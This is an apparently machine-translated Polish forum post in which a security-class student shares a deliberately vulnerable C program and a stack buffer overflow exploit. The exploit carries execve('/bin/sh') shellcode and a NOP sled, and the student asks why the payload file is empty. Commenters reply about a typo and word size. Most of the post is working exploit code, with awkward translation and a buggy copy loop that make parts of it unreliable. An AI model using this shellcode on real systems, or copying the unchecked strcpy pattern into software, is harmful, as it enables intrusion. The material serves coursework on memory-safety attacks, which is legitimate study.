Uczący to przepełnieniem buforu rzeczy dla klasy bezpieczeństwa, staram się wykorzystać tę lukę w tej aplikacji:przepełnienia bufora jak homeowrk
//vuln.c
#include <stdio.h>
int bof(char *str)
{
char buffer[12];
//BO Vulnerability
strcpy(buffer,str);
return 1;
}
int main(int argc, char* argv[])
{
char str[517];
FILE *badfile;
badfile = fopen("badfile","r");
fread(str, sizeof(char),517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
Używanie tego wykorzystać aplikację:
//exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
const char code[] =
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;
int main(int argc, char* argv[])
{
char buffer[517];
char large_string[512];
FILE *badfile;
badfile = fopen("./badfile", "w");
//NOPslide
memset(&buffer,0x90,517);
//BEGIN FILL BUFFER
//from stack_smashing.pdf
long *long_ptr = (long *) large_string;
int i;
for (i = 0; i < 128; i++)
*(long_ptr + i) = (int) buffer;
for (i = 100; i < strlen(code)+100; i++)
large_string[i] = code[i];
strcpy(buffer,large_string);
//END FILL BUFFER
//save buffer to badfile
fwrite(buffer,517,1,badfile);
fclose(badfile);
return 0;
}
Dla z jakiegoś powodu, kiedy tworzę badfile, uruchamiając exploit, nie wciska nic do niego. Albo bufor jest pusty, albo nie zapisuje poprawnie. Nie mogę znaleźć mojego błędu i po niestrudzonym wyszukiwaniu w Google nie udało mi się znaleźć wystarczającej odpowiedzi. Z mojego zrozumienia kodu bufora wypełnienia, którego użyłem, powinno to wypełnić long_string adresem mojego bufora, następnie umieścić mój kod powłoki na początku long_string (po odrobinie slajdu NOOP), a następnie skopiować long_string z powrotem do bufora. Naprawdę nie widzę żadnego problemu z tym lub z fwrite. Propozycje?
Czy 'badfile - fopen (" badfile "," r ")' literówka w kodzie, lub twój post? – ughoavgfhw
Przyjmując 'sizeof (long) == 4' (tj. Program 32-bitowy), kod powinien działać tak, jak jest. –
Zakładając sizeof (long)> 4, kod ma przepełnienie bufora. – Sebastian